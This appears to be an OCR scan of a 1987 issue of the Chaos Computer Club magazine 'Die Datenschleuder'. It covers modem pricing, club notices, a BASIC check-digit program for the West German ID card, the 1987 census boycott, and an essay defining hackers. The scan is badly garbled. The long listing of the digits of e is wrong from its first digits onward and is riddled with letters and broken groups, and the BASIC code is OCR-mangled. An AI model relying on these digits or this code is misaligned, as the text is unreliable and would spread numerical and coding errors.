2400 Baud 2- Draht Vollduplex Modems von Kabel- 
metal und Siemens, deren Absatz gesichert werden 
muß. Hier liegt einer der Hasen im Weffer: Das Post- 
Modem D2400S nach CCITT V22bis einschließlich 
automatischer Wahlcinrichtung nach CCITT V25bis 
kostet 5800.- DM! Wem wuchert es nicht, denn auch 
eine monatliche Miete wird mit 120.- DM recht teuer. 
Folglich versucht die DBP mit allen Trix die Priva¬ 
tanbieter zu schocken. Zum einen verzögert sie das 
Erscheinen der Zulassungsbedingungen, um den ei¬ 
genen Absatz zu sichern mit der Begründung, erst 
eine EG-weite Einigung erreichen zu wollen. Zum 
anderen wird dem Anwender eine Schikane aufge- 
drückt in Form einer monatlichen Prüf- und Meßge¬ 
bühr von bis zu 25.- DM bei Einsatz von privaten 
Modems. Als besondere Krönung bedankt sich die 
DBP noch zu guter letzt mit dem gefürchteten Ge- 
bührcnhoiToram PATTEX-D Zugang. 

Vorerst wird es also nichts aus dem durch die 30. 
ÄndVFO garantierten freien Modemmarkt. S. Stahl 


Mohr als 20 Soc. 
3uf Höchststufe 
... 15... 


BGB: Das meistgeklaute Buch 

(dsndr) Wie eine Untersuchung öffentlicher Bibliot¬ 
heken ergab, steht juristische Literatur und dabei das 
Bürgerliche Gesetzbuch an der Spitze entwendeter 
Bücher. wau 


IMPRESSUM 

DIE DATENSCHLEUDER Nr.19, 31.4.87 
Das wissenschaftliche Fachblatt 
für Datenreisende. 

Schwenckestraße 85 
D-2000 Hamburg 20. 

GeoNet: Geol: Chaos-Team 
BTX-Leitseite: *655321 * # 
Herausgeber und V.S.0.P.: 

Herward Holland-Moritz. 

Mitarbeiter (u.a.): marina kern, 
R.Schrutzki, S.Wernery, A.Eichler, 
P.Franck, M.Kuehn, Andy M.-M., KS, 
Jwi, DDT, Carsten, Poetronic, TL. 
Vierfarb-Kartoffelhochdruck im 
Selbs tverlach. 



Die Datenschleuder 


DS Seite 15 



't::zri.abt»B^Uc>« C9927F Gab.baz. 


Wenn unzustellbar 
Anschriftenausschnitt bitte 
mit neuer Adresse zurück 


In 

eigener 

Sache! 

1) Schickt uns keine EINSCHREIBEN, 
die können nämlich bis auf weite¬ 
res nicht angenommen werden (Hab 
keinen Perso in dem ich Chaos 
Computer Club heiße). 

2) Das in der DS18 angebotene 
Paket zur Volkszählung ist nun 
wiederwärtigerweise doch nicht 
lieferbar, da uns die Vertriebs¬ 
rechte von der Autorin nicht 
erteilt worden sind. Eingegangenen 
Bestellungen werden irgendwie 
erstattet. 

3) Zur Zeit sind auch die Aufkle¬ 
ber ''Kabelsalat'' und "Achtung 
Abhörgefahr" nicht lieferbar. Vor¬ 
liegende Bestellungen werden auf 
Halde gelegt oder in Briefmarken 
erstattet. 

4) 'Bitte schickt uns keine Brief¬ 
marken in 5Pf Werten mehr. Am 
häufigsten brauchen wir 80Pf, aber 
auch 50, 20 und selten lOPf werden 
benötigt. 

5) Kurze Briefe die sich mit ein 
paar Sätzen beantworten lassen 
(oder mit einer ProbeDS) werden 
schnellstens Bearbeitet. Längere 
Anfragen bitte am einfachsten 



telefonisch über den Club 
(040/4903757) oder in ganz drin- 
goiiden Fällen bei mir Privat (Mo- 
Pr 10-23 Sa-So 12-23 unter 
040/3193604). Das sind KEIME ilail- 
boxen und wer sich nicht an die 
angegebenen Zeiten hält der wird 
ohne Antwort auf seine Fragen 
bleiben. DAS IST BIERERNST!!!!! 

6) Wenn ihr was von uns schrift¬ 
lich wollt, dann legt doch am 
besten (für uns) eine ausreichend 
frankierten und korrekt adressier¬ 
ten A5-Umschlag bei. Was ihr für 
unsere Portokasse haltet ist näm¬ 
lich mein privates Portmonaie, und 
das ist leer! 

7) Und noch was, schreibt bitte 
wenigstens eure Adresse leserlich 
(ich bin KEIN Cryptologe) und 
unsere Antworten kommen dann auch 
bei euch an. 

8) Frankiert bitte ausreichend, 
ich mag kein Nachporto, ihr doch 
auch nicht, oder? 

So das v;ars, was mir auf der Seele 
brannte. 

MFG MMU 


DS Seite 16 



Die Zahl Endlich. Die Genauigkeitsfanatiker haben lan¬ 

ge auf diese Sensation gewartet. Natürlich ver¬ 
öffentlichen wir e, die natürlichste aller natürli¬ 
chen Zahlen, auf 10.000 (in Worten; zehntau¬ 
send) Stellen hinter dem Komma, und zwar als 
Fortsetzungsgeschichte. 

Hier nun die erste Folge der Zahl e, die nach 
337.61 Sekunden aus einem ATARI 520 aus- 
geworien wurde: 


2.71928 182B4 59045 2353f> 02074 

71352 

74272 

28364 

89613 

42251 

64450 

79182 

66249 

77572 

47093 69995 

95749 

66967 

44235 

29486 

36372 

14174 

02398 

9344 1 

62772 

40766 

30353 54759 

457 13 

82178 

24796 

35743 

70263 

75529 

44483 

37998 

52516 

64274 

27466 39193 

20030 

5992 1 

01612 

54922 

7B509 

25770 

25620 

92622 

8174 1 

35966 

29043 57290 

03342 

95260 

64332 

62779 

33386 

5664B 

16277 

25164 

59563 

07381 

32328 62794 

34907 

63233 

01910 

59004 

91644 

99820 

93150 

56604 

S29B3 

07531 

95251 01901 

1 5738 

34107 

72530 

27786 

31964 

15519 

56532 

44258 

93070 

21540 

99149 93488 

41675 

09244 

69829 

46959 

30801 

91529 

872 1 1 

72556 

76146 

06680 

82264 80016 

84774 

1 1853 

34754 

63964 

479 10 

1 4590 

40905 

B6298 

74234 

54424 

37107 53907 

77449 

92069 

49679 

12874 

06870 

50489 

58586 

71747 

55170 

27618 

38606 26133 

1 3845 

83000 

98546 

67757 

57320 

568 1 2 

B8459 

2054 1 

75204 

49338 

26560 29760 

67371 

13200 

33405 

39220 

00113 

79630 

09455 

60689 

70952 

87091 

27443 74704 

72306 

96977 

16674 

00169 

84205 

53040 

33637 

95376 

20931 

01416 

92836 81902 

55151 

03657 

45203 

04024 

32256 

61352 

7B369 

51177 

46377 

21112 

52399 73442 

50569 

53696 

33386 

39744 

39662 

53224 

9B506 

54995 

77078 

54499 

69967 94686 

44549 

05987 

88623 

42818 

99707 

73327 

61717 

83923 

93l 63 

68892 

30099 79312 

7736 1 

782 15 

03494 

65Q14 

34558 

89707 

19425 

36399 

42499 

92295 

76351 48220 

82698 

95193 

77275 

47109 

62953 

74152 

11151 

36835 

66803 

31B25 

20869 39849 

64651 

05320 

06275 

26023 

26434 

72870 

39207 

643 10 

93923 

98294 

80793 32036 

25094 

43117 

05958 

41166 

12054 

52970 

30236 

47254 

30123 

81970 

68416 14039 

70198 

37679 

92966 

69381 

15137 

32275 

36 450 

98389 

32068 

32823 

76464 00429 

53118 

02328 

03136 

02057 

249 1 7 

65851 

18063 

03644 

78250 

98194 

5581 5 30175 

67173 

613-32 

23123 

14965 

50704 

75102 

54465 

01172 

06981 

I 2509 

96181 88159 

304 16 

90351 

72115 

55194 

86685 

08003 

68532 

2818.3 

59338 

35193 

45807 27386 

67335 

39422 

15219 

60037 

35625 

27944 

95158 

294 18 

87922 

B4998 

92086 80582 

57492 

796 10 

82947 

376 10 

85263 

98139 

55990 

06737 

484 19 

84443 

63463 24496 

84875 

60233 

64829 

22443 

75287 

18462 

45780 

36192 

62482 

70419 

79623 20900 

21609 

90235 

98197 

13991 

47564 

4992.6 

26039 

03381 

30436 

99413 

49146 31409 

3431 ? 

38143 

44182 

32625 

1 5097 

48279 

87779 

9643? 

64054 

62531 

52096 10.369 

08337 

07016 

30899 

70338 

86778 

227 1 3 

83605 

77297 

76839 

64243 

78140 59271 

45635 

49061 

3324 1 

2561 1 

90717 

66394 

65070 

63304 

30310 

72085 

10333 75051 

01157 

47704 

52795 

4661 8 

5509ö 

66613 

56647 

09711 

17189 

36106 

87396 96552 

1 2671 

54688 

34447 

40160 

70462 

62156 

80717 

48137 

95703 

50354 

02123 40784 

98193 

34321 

78443 

71436 

98821 

35596 

70959 

10259 

06B17 

01210 

05627 88023 

51930 

33224 

63620 

02353 

71853 

37435 

69652 

20005 

74501 

5S539 1 

J4730 41995 

77770 

93503 

03117 

34392 

07321 

13908 

03293 

63447 

66041 

69973 29725 03868 

76966 

40355 

97273 

55955 

27734 

90717 

83793 

42163 

57071 

62268 447.16 25607 

93926 

51787 

70120 

50054 1 

51326 : 

58354 

40001 

36323 

13419 

51246 6 

5201 03059 

21236 

677 1 9 

99149 

07054 : 

79778 05669 

78533 

58048 

43252 

78675 3985S 89443 

96970 

96409 

96690 

629SI 1 

19432 47309 

95876- 

55236 





V 7 


« A l 

'12Z_U 

4 itVty •? 

•7.4»« "2^ 

~ « 





. Maschinenlesebarer Ausweis 

|b 1.April müssen die autometengerechten Per- einer laufenden Zählnummer, die 10. Stelle ist 
SOS beantragt werden. Zur besseren maschi- eine Prüfsumme, um Lesefehler zu erkennen 
nellen Bürgerverarbeitung ist jetzt der Erts- oder gar zu beheben. Hier das Prüfsummen¬ 
wohnsitz in den ersten vier Stellen der Se- Rechenprogramm: 
riennummer verdatet, Stelle 5 bis 9 entspricht 

Prgniname$= "BPAPRFl" Erstellt anhand eines Dokujnentes der Dundesdruiikorei 
Vers i ün$ ='* SV 1.01" ! "MERKBLATT fuet Personalauswt isbehoerden" 

StainpS = '*198703271654"! 5.4 Detailvorschriften 

CopyrightS="wau" ! Regeln fuer das Errechnen der Pruefziffer 

Seriennuinraerlaenge = 9 ! Stelle i..4: Behoerdenkennzahl, 5..9: lfde. Rr. 

' Diese S ta*ndard is i erung automatisiert Zugriff ueber Behoerde am Hauptwohnurt 
Dim Produkt(Seriennummerlaenge) 

Ser iennusumer § = " 270752123 " I Test-Mus ter nummer, deren Pruefziffer 7 ist 
Faktorschluessel$="73173i731'' Faktorenfolge zur Pruefziffernberechnung 
Fehlec=False ! kein Fehler bei der Eingabe 
Print "BundesPersonalAusweisPraefziffetnberechnutig " 

Print "Programm "; Prgmname " Version "; Ver s i onC; Da tumze i t gt uppe : ";Staiiip$ 

Do J Ewige Schleife 

Input "Maschinenlesbare Ausweisnummet ohne Pruefziffer: ", Seriennumme tS 
Exlt l£ Len(Seriennuinmet$)=0 ! Abtaruchbedingung Leereingabe 
Gosub Eingabepruefung — 

ff Not Fehler / A 

Gosub Errechne_pruefZiffer / \ 

Print "Gefundene Pruefziffer ist: Prue f z i ff er [ \ 

Endif 

Loop \ / 

End 

Procedure Eingabepruefung 

l£ LenfSerlennummer$)OSeriennummerlaenge ! Eingabepruefung Laenge 

Print "Fehler - falsche SeriennummernlaengeJ (Abbruch mit Leereingabe)" 

Print Seriennummer $ 

Fehler=True 

Endif 

For I-l To Serlennuminerlaenge Eingabepruefung Ziffern 

I£ MidS(SeriennummerS,I,l)<"0" Ot Mid$ (Ser i ennuminer $, 1,1) >"9 " 

Print "Fehler - andere Eingabe als Ziffer! (Abbruch mit Leereingabe)" 
Fehlet=Ttue 
Endif 
Next I 
Return 

Procedure Errechne^pruefziffer ! Die folgenden "Zitate" aus o.a. Dkument. 

• "Die Endziffer der Seriennummer iat die Pruefziffer, die auf der 
' Basis von Modul 10" (richtig: "modulo 10") wie folgt errechnet wird:" 

Gosub Stufel ! "Multiplizieren jeder Ziffer der Bohoerdenkennzahl und der 
' laufenden Nummer, beginnend mit der erster» Ziffer der Behoerdenkennzahl 
’ mit den Faktoren 731731731" 

Gosub Stu£e2 ! "Addieren der Einzelprodukte" 

Gosub Stufe3 ! "Dividieren der Summe durch 10 (Modul)" 

Gosub Stufe4 ! "Verbleibt bei dieser Division ein Rest, so ist dieser die 
Return ! pruefziffer, verbleibt kein Rest, so lautet die Pruefziffer 0." 

Procedure Stufel ! Ziffernweise Multiplikation 3 er iennunimer*Dehoerdenkenrizahl 
For 1=1 To Seriennummerlaenge 

Produkt(I)=Val{Mid$(SeriennummerS,1,1))*Va1(Mid$(Schluesselfaktur $, 1,1)) 

Next I 
Return 

I 

Procedure Stu£e2 I Addieren der Einzelprodukte 
Summe=0 

For 1=1 To Ser lennunimerlaenge 
Add Summe,ProduktCI) 

Next I 
Return 

Procedure Stu£e3 ! Dividiere die Summe durch 10 ohne Rest 

Zehntel_ohne_rest=Int(Summe/lO) 

Return 

Procedure Stu£e4 I Pruefziffer ist der bei der Division verbleibende Rest 

prue£zl££er = Sunime-Zehntel_ohne_rest‘10 

I Return 


,S)ie ^aten^cl^leuber 



ds-Red. Hamburgs Volkszählungsiniliativcn haben 
am 20. März ihr Konzept zur endgültigen Verhinde¬ 
rung der„geplanten staatlichen totalen Erfassung be¬ 
kanntgegeben. Danach soll es zumindest in Hamburg 
ausschließlich einen "harten” Boykott" geben. Von 
verdeckten "weichen" Widerstandsformen raten die 
Initiativen wegen der rechtlichen Konsequenzen für 
den einzelnen ab. 

Die VoIkszähJungsiniliativen empfehlen ein Drei¬ 
phasenkonzept anläßlich der geplanten Volkszäh¬ 
mung ’87": 

1. Annahme des Bogens an der Haustür und Mittei¬ 
lung, daß er dem Statischen Landesamt zurückge¬ 
schickt wird ("Jaja, keine Zeit jetzt"). 

2. Eigenhändige Anonymisierung durch Umgestal¬ 
tung der Ordnungsnummer zum Chaosloch im 
Volkszähmungsbogen mit scherenartigen Werkzeu- 
gen. 

3. Wciterleitung der so anomynisierten Unterlagen an 
die nachbarschaftlichen Initiativen oder VoBo- 
Sammelstellen. 

Der dritte Punkt dient der Information der Öffent¬ 
lichkeit über die Breite des Widerstandes in anonymi¬ 
sierter Form. 

Adressen und Treffs örtlicher Initiativen können, wie 
bei der letzten verhinderten Zähmung, u. a. über 
Stadtzeitungen und - teilweise - über Datenschutz- 
beaufiragle und Parteien erfragt werden. 

Angesichts der vielen Werbemillionen für die Indula- 
Neuverdatung fordern Spötter anstelle der Volks¬ 
zähmung mit ihren Wcrbcmillionenmark die allge¬ 
meine Volkszählung *87 dieser Millionen und werfen 
Zählungsfan Heino ("deutscher Sänger für deutsche 
Zählung") vor, er hätte nur Angst, versehentlich im 
polizeilichen Fahndungsraster mit einem von ihm 
beklagten Doppelgänger von den Toten Hosen ver¬ 
wechselt zu werden. 

Gloria von Thurn und Taxis, durch Familieniradition 
dem Reichspostregal und so der Einführung der Da- 
tenweilergabe an die Hoheit (werschreibl wann wem, 
gegebenenfalls was?) verbunden, wird im Spiegel 
zum Thema zitiert mit "Kriminelle Elemente besser 
erfassen". 

Der SPIEGEL zitiert als CCC-Ratschläge ein wei¬ 
ches Boykottkonzept; ein anderswo verdrucktes Zi¬ 
tat, das die Meinung im Chaos Computer Club nur 
sehr verkürzt wiedergibt. wau 


Formel NullEins: 
Die Hacker-Charts 

1 The Bitles 

YELLOW SUBROUTINE 

2 John TraVolt 
EVERY NIGHT FEVER 

3 Elvis Presley 
IN THE GOTO 

4 Talking Heads 
STOP SENDING SENF 

5 Scrolling Stones 
GIMME PASSWORD 



^te SJateni^cl^rcuber 


6 VAX Pistols 
GOD SAVE THE PIN 

7 Think Floyd 
DARK SIDE OF THE CPU 

8 Simon & Furunkel 
BIT OVER TROUBLED DATA 

9 Tina Turner 
NETWORK CITY LIMIT 

A Low Read 

WALK ON THE FILE SIDE 


53537 

0S76I 

38939 

63917 

79574 

54016 

13722 

36187 

89365 

26053 

81558 

41587 

18692 

55386 

06164 

77983 

40254 

35128 

43961 

29460 

35291 

33259 

42794 

90433 

72990 

85731 

58029 

09586 

31382 

68329 

14771 

16396 

33709 

24003 

16894 

53636 

06064 

58459 

25126 

99465 

5724B 

39196 

■56420 

97526 

85082 

30754 

42545 

99376 

91704 

19777 

80085 

36273 

09417 

10163 

43490 

76964 

23722 

29435 

23661 

25572 

50881 

47792 

23151 

97477 

80605 

69672 


Informationelle 

Selbstbestimmung 

leichtgemacht 


(Hamburg,CRD) Seltsames widerfuhr einem Aktivi¬ 
sten, der beim Hamburgischen Statistischen Landes¬ 
amt um Informationsmaterial zur Volkszähmung 
nachsuchle. Als er das gwönschte Material nebst 
Tbrdröcker schon in der Hand hielt, wurde er von der 
HaSlaLA - Dame zwecks Adressabgabe zuröckbeor- 
dert. Als unser Protagonist nach erfolgter Datenab¬ 
gabe bemerkte, daß seine Daten auf einen Stapel 
gleichartiger Formulare gepackt wurden, fragte er si¬ 
cherheitshalber nach dem Verwendungszweck und 
erhielt den lakonischen Bescheid, der Rechnungshö¬ 
fe verlange diese Angaben. Angesichts der Unwahr¬ 
scheinlichkeit dieser Aussage und des geringen Wer¬ 
tes der erhaltenen Infos, auch in materieller Hinsicht, 
wurde der Datenerfassungsbeleg in Privatbesitz 
zurckgefhrt, was zu heftigem Protest der Dame und 
Herbeiruf eines Vorgesetzen derselben führte. Dieser 
bezog sich ebenfalls auf den Rechnungshof und ver¬ 
langte entweder den DEB oder das Infomaterial zu¬ 
rück, beides wurde verweigert und der Beleg sicher¬ 
heitshalber zerrissen in die Jackentasche versenkt. 
Aber selbst derart verstümmelte Daten wecken das 
Interesse eines Statistikers, und das Angebot des 
Vorgesetzten, man könne die Fetzen gerne im amtsei¬ 
genen Papierkorb endlagern, erschien wie die verge¬ 
blichen Versuche eines Vampirs, an die letzte unver- 
seuchte Blutkonserve zu gelangen. Nachdem es 
schliesslich gelungen war, mit dem Informationsma¬ 
terial und ohne Zurücklassung personenbezogener 
Daten das HaStaLAzu verlassen, bestätigteein Kon- 
trollanruf beim Rechnungshof die Handlungsweise; 
Dort wusste man nämlich nichts von eine derartigen 
Anweisung. 

Bis zur Stunde konnte nicht zweifelsfrei geklärt wer¬ 
den, wozu die Daten nun wirklich benötigt werden. 

goblin 



splitlW.doc 198703201750 g 27.15:30 wau 



Volkszähmung 

Kein Datenschutzkonzept - Hacker wollen 
Volkszählungssottware testen 

Hamburg - Sogenannte Virenprogramme, die 
sich automatisch in Computersystemen ver¬ 
vielfältigen und dort Datenbestände und Pro¬ 
gramme verändern und zerstören können, 
standen im Mittelpunkt des letzten Hacker¬ 
kongresses (CCC) in Hamburg. Seitdem kur¬ 
siert das Gerücht, Hacker wollten solche Com¬ 
puterviren in die Rechenzentren der statisti¬ 
schen Landesämter einschleusen und damit 
die Auswertung der Volkszählungsdaten lahm¬ 
legen. Doch solchen Vorhaben fehlt bis auf 
weiteres die Grundlage, so jedenfalls war aus 
der bayrischen Hackerszene zu erfahren. Bis¬ 
lang läge den verantwortlichen Rechenzentren 
noch kein funktionsfähiges Auswertungspro¬ 
gramm vor. Das Statistische Bundesamt hat für 
Herbst diesen Jahres lediglich den Entwurf 
eines Datenverarbeitungskonzeptes ange¬ 
kündigt. Fachleute vermuten, ein den Anfor¬ 
derungen genügendes Computerprogramm 
werde es als Rohversion frühestens im Früh¬ 
jahr 1988 geben. “Ohne fertige Software“, so 
Thomas Vogler von der Bayrischen Hackerpost 
(B.H.P.), “macht der Einsatz von Viren nicht 
allzuviel Sinn.“ 

Die B.H.P. ist so etwas wie das südliche Ge¬ 
genstück zum Hamburger “Chaos Computer 
Club“. Bereits 1985 entstand auf Initiative der 
bayrischen Hacker das “Bayrische Forum 
Mensch und Computer e.V.“. Ein Verein, der 
sich den Wechselwirkungen zwischen Mensch 
und Technik widmet. Das Spektrum der The¬ 
men reicht von sozialen Folgeabschätzungen 
des Computereinsatzes bis zur computerge¬ 
rechten Vollwerternährung. Das Verhältnis zwi¬ 
schen Mensch und Technik war auch das Motiv 
der B.H.P.-Berichterstattung über das Reak¬ 
torunglück in Tschernobyl. Innerhalb weniger 
Tage hatte die bayrische Hackerszene einen 
Informationsdienst mit ersten Meßergebnis¬ 
sen, Verhaltenstips, Umrechnungstabellen der 
verschiedenen Strahlenwerte und Hinter¬ 
grundberichten aufgebaut. Mittels internatio¬ 
naler Computemetze wurden Korresponden¬ 
ten angeschrieben und eingehende Meldungen 
verbreitet. Ein Trumpf, der auch gerne gegen- 
ueber den als computerfeindlich geltenden 
Grünen ausgespielt wird. 

Illlllllllllljjlll 


Jetzt wollen sich die Bayern der Volkszählung 
widmen. Nach der Devise “Konkurrenz belebt 
das Geschäft“, haben sie Anfang April die bun¬ 
desdeutsche Hackerszene zu einem Wettstreit 
mit den Entwicklern der Volkszählungssottware 
aufgerufen. Die Grundlage bilden neben einer 
gewissen Anzahl per Computer zusammen¬ 
gestellter Pseudo-Bundesbürger freiwillig ab¬ 
gegebene Daten die nach dem gleichem Raster 
wie das der Volkszählung 1987 erhoben wur¬ 
den. Für den Umgang mit diesen Daten haben 
sich die Akteure notarieller Aufsicht unterstellt. 
Erklärtes Ziel: Nach allen Regeln der Kunst soll 
aus den Daten “rausgeholt werden, was raus¬ 
zuholen ist“. Mit Rückgriff auf öffentlich zu¬ 
gänglichen Daten soll ein möglichst vollstän¬ 
diges Persönlichkeitsabbild des Menschen im 
Rechner enstehen. Ob dies gelingt, bleibt da¬ 
hingestellt. Auf alle Fälle rechnet das “Bayri¬ 
sche Forum Mensch und Computere.V."damit, 
daß durch diese Aktion Sicherheitsfragen zu¬ 
tage gefördert werden, die in bisherigen Da¬ 
tenschutzkonzepten nicht berücksichtigt wur¬ 
den. 

Am 25.April, also einen Monat vordem Stichtag 
der offiziellen Volkszählung, wollen die 'le¬ 
bensbejahenden DFÜ - Benutzer'von der BHP 
mit ihrer “Aktion Kontrollzählung“ beginnen. 
Gegen Rückporto versendet das “Bayrische 
Forum Mensch und Computer e.V.“ durchnu¬ 
merierte Erfassungsbögen, auf denen derselbe 
Datensatz abgefragt wird wie bei der “Volks¬ 
zählung 1987". Allerdings darf bei der Kon¬ 
trollzählung geschummelt werden, - aber nicht 
zu arg, wie Vogler warnt. “Auch wir führen eine 
Plausibilitätskontrolle durch und werden zei¬ 
gen, wie gut das funktionieren kann“. Unter 
Einhaltung der gesetzlichen Datenschutzbe¬ 
stimmungen, über die ein Notar wacht, wollen 
die Bayern die Daten ihrer Kontrollzählung ein¬ 
geben und verarbeiten. Gegen Teilnahmege¬ 
bühr wird Einblick in die persönliche Date¬ 
nauswertung gewährt. Daß gesetzliche Rege¬ 
lungen den technischen Möglichkeiten immer 
um einige Jahre hinterhinken, wird von nie¬ 
mandem ernsthaft bestritten. “Doch was das 
bedeutet, glauben die Leute erst, wenn man es 
praktisch demonstriert“, meint Vogler. Und 
genau das hat die Hackerszene vor. 

Von einer ganz anderen Ecke wurde bereits 
Ende letzten Jahres die Datensicherheit der 
Volkszählung auf Herz und Nieren geprüft. Der 
Hamburger Informatikprofessor Klaus Brunn¬ 
sfein und seine Mitarbeiterin Marion Fischer- 
Hübner traten mit 100 000 Spieldaten den 

^aten^cJ^leuber 


Nachweis an, daß mit relativ wenig Aufwand 
aus einer schier unüberschaubaren Daten¬ 
menge Einzelpersonen herausgefiltert werden 
können. Maximal 10 von den insgesamt 33 
Einzeldaten aus der“Volkszählung 1987“seien 
dazu notwendig. 

Die jederzeit mögliche Re-Identifizierung be¬ 
reits anonymisierter Daten halten die Bayern 
jedoch für ein vergleichsweise harmloses Pro¬ 
blem. Weit ernster nimmt man die sich ab¬ 
zeichnende technische Möglichkeit, aus dem 
“persönlichen Datengerippe“ jedes Einzelnen 
in Verbindung mit anderen Verwaltungsdaten 
allmählich “individuelle“ Persönlichkeitsbilder 
aufzubauen. "Nimmtman nurgenügend andere 
Daten und Erkenntnisse zu Hilfe, kann letztlich 
ein vollständiges elektronisches Gegenstück 
des einzelnen Menschen im Rechner simuliert 
werden“, erklärt Vogler seine Bedenken. “Ein 
entsprechend programmiertes Expertensy¬ 
stem, gefüttert mit Erkenntnissen etwa aus der 
Verhaltenspsychologie, könnte den Menschen 
scheinbar berechenbar machen." Wie dem 
auch sei. Jedenfalls wollen die Hacker der Of- 
tentlichkeit, im Gegensatz zu den statistischen 
Landesämtern, einen regelmäßigen Tätig¬ 
keitsbericht über den Stand ihrer Sottwa- 
reentwicklung präsentieren. 

Von der “Hacksicherheit“ der Rechenzentren ist 
Vogler nicht überzeugt: “das Gesetz regelt die 
Vorgänge des Kopierens und Löschens so, als 
wären Magnetplattenspeicher und simple Ak¬ 
tenordner ein und dasselbe. Irgendwann 
kommt jemand an die Daten, für den sie nicht 
bestimmt sind.“ Ob denn die Hackerszene die 
Volkszählung boykottieren werde? "Jeder soll 
tun, was er für richtig hält - und wer sich zählen 
lässt, gehört regislnert “, meint Vogler viel¬ 
deutig. Er selbst will den Erhebungsbogen ord¬ 
nungsgemäß ausfüllen, ihn allerdings bei 
einem Notar hinterlegen und mit dessen Be¬ 
glaubigung eine einstweilige Verfügung erwir¬ 
ken. “Erst möchte ich geklärt sehen, ob ich 
angesichts der offensichtlichen gesetzgeberi¬ 
schen Flüchtigkeitsfehler verpflichtet bin, den 
statistischen Ämtern persönliche Daten zum 
Zwecke der Softwareentwicklung zu überlas¬ 
sen, ohne daß geklärt wäre, was sie program¬ 
mieren dürfen und was nicht.“ 

jwi 

volksza20.ds 198704161755 

53801 7:5ß7 7,1360 1462i 59278 77846 
58306 50050 73084 42115 29697 52199 


Auffällig ist bei uns 
das Unauffällige. 



08740 19660 90665 130.35 16501 79250 

46195 01366 59543 66327 12549 63990 

05491 44200 01457 4760B 19302 21206 

60243 30096 41270 48943 90397 17719 

51806 99036 99860 66365 83232 27870 

93765 02260 14929 10115 17177 63594 

46020 23249 30028 04013 67723 91023 

B0978 66605 65118 32600 43638 50881 

71572 38669 84224 22010 24950 55183 

16948 03221 00251 54264 94639 81287 

36776 58927 68816 35983 12477 88652 

01411 74110 91360 11649 95076 62907 

79436 46005 05194 19985 60162 64790 

76153 21038 72755 71269 92518 27568 

79B93 02761 76114 61625 49356 49590 

37980 45838 18232 33686 12016 24373 

65698 46703 78585 33052 75833 33793 

99075 21660 69238 05336 98879 56513 

72855 93883 49989 47074 16181 55012 

53970 64648 17194 670B3 48197 21448 

88987 90676 50379 59036 69672 49499 

25452 790,33 72963 61626 58976 03949 

85767 41397 35944 10237 44329 70935 

54779 82629 61459 1442V 36451 42861 

71585 87339 74679 13975 71211 95618 

73357 83644 75844 34235 55501 05002 

56114 92391 51839 30994 63428 41393 

60803 3-3091 66281 331 15 0-3715 28496 

70597 41625 62323 60921 69075 15017 

77253 87402 56425 .34703 79089 13729 

17228 2361I 51591 56837 25241 63077 

22544 06.3.37 37593 10598 26760 94420 

32619 24235 31701 97817 72960 23541 

30606 721.36 04600 03S96 61093 61709 



Aus für “Hacker“? 

51414 17185 77701 A180Ä 04443 43681 

Dieser Essay ergab sich spontan aus einer Diskussion 
im ”HackerInfo’'-Brett der CLINCH-Mailbox. Hier¬ 
bei wurden u.a. rechtliche Aspekte der abgelegten 
Hackerinformationen diskutiert: 

Nehmen wir also an, ein Freund namens Willy hat er¬ 
fahren, daß das Kraftfahrbundesamt in Flensburg 
einen Abfragecomputer für die berüchtigte Daten¬ 
bank (die mit den vielen.) *’an das Netz ge¬ 

hängt" hat. Also fragt er seinen schon auf den Netzen 
erprobten Freund Schorsch, wie man denn vielleicht 
an die Nua dieses Rechners herankommen könnte. 
Schorsch als alter Freund legt eine entsprechende 
Antwort im Brett ab (Nuascanner, "social enginee- 
ring" usw.), die der Auslöser für obige Diskussion 
wird. Sind nun Schorschis Informationen als "Beihil¬ 
fe zu einer Straftat" aufzufassen oder, wie es in der 
Absicht von Schorsch lag, als einfacher Gedanken- 
und Erfahrungsaustausch zwischen Freunden, Kol¬ 
legen usw.? Hierbei wurde nun allen "Hackern" ein 
sträflicher Leichtsinn im Umgang mit den Informa¬ 
tionen vorgeworfen und nahezu das gesamte Hac¬ 
kerwesen in Frage gestellt. Denn sind Hacker die 
Leute, die dann tatsächlich auf selbstverständlich 
verbotene Weise sich Zutritt zu diesen Rechnern ver¬ 
schaffen? Hierbei muß klargestellt werden, was denn 
ein Hacker nun eigentlich ist. 

Mancher mag sich unter einem "Hacker" ein Männ¬ 
lein mit einer überdimensionalen, blutbefleckten Axt 
vorstellen, der am Flughafen auf besetzte Terminals 
wartet um zuzuschlagen; manch anderer ein kaum als 
Mensch zu ideniinzierendes Individuum mit langen, 
fettigen Haaren, glasigen Augen, kaffeebeflecktem 
Compulerpapier unterm Arm und Ringen unter den 
Augen, wie sie sonst ein frisch gebackener Ehemann 
nach der Hochzeitsnacht an seiner Angetrauten zu 
finden hofft. Aber was sind denn Hacker nun? 

In Deutschland ist "Hacker" der pauschale Oberbe¬ 
griff für all das, wofür sich die Amerikaner (jaja, 
wieder ein typischer Fall der ewigen Ein-Amerikani- 
sierung) jahrelang fein abgegrenzte Begriffe definiert 
haben: den Hacker, den Phreak, den Crackerund den 
Crasher. 

HACKER • Der wohl älteste Begriff, gibt es, seil dem 
es Computer gibt, und zwar nicht nur PC’s, sondern 
auch die alten Kleiderschränke mit dem Düsenjet¬ 
sound. Der Autor hat vor 8 Jahren die ersten echten 
Hacker kennengclernt, im Rechenzentrum einer gro¬ 
ßen Firma, offiziell als Operateure beschäftigt. Jene 
welche hatten eine interne Wette laufen, wer es als er¬ 
ster schafft, das Betriebssystem so zu patchen, daß je 
nach Wochentag bestimmte Meldungen auf der Ma- 
sterconsole erscheinen wie "Sonntag ist Sabbat - 
please logoff’. Dafür wurde auch bis spät in die 
Nacht "gearbeite". 

Oder die Geschichte aus den USA, wo auf einem 
IBM-Kongreß ein inoffizieller Wettbewerb lief, wer 
das unverständlichste APL- Programm schreiben 
konnte (gewonnen hat übrigens ein Herr, der sein ei¬ 
genes Programm nicht verstanden, geschweige denn 
wiedererkanni hatte, nachdem einige Scherzbolde 
seinen Copyright- Vermerk entfernt hatten). 


546^4 

19494 



40053 31ö0a 77531 
22975 59931 40119 
06553 93300 46932 


4.3174 

98693 

90115 


44081 
31483 
744 1 4 



Hacker waren bzw. sind also User, die so vernarrt in 
ihre Kiste sind, daß sie sich praktisch mit ihr "verhei¬ 
raten". Der Autor hat seinen ersten Weg zum Hacker- 
tum in seiner Schulzeit im zarten Alter von 16 ge¬ 
macht, als er an dem Schulcomputer (ein aller HP- 
Rechnermit SkByte, 1-Zeilen LED-Display) versuch¬ 
te, eine Folge von BASIC-Befehlen zu einem sinnvol¬ 
len Programm zu bewegen. Irgendwelche Hinter¬ 
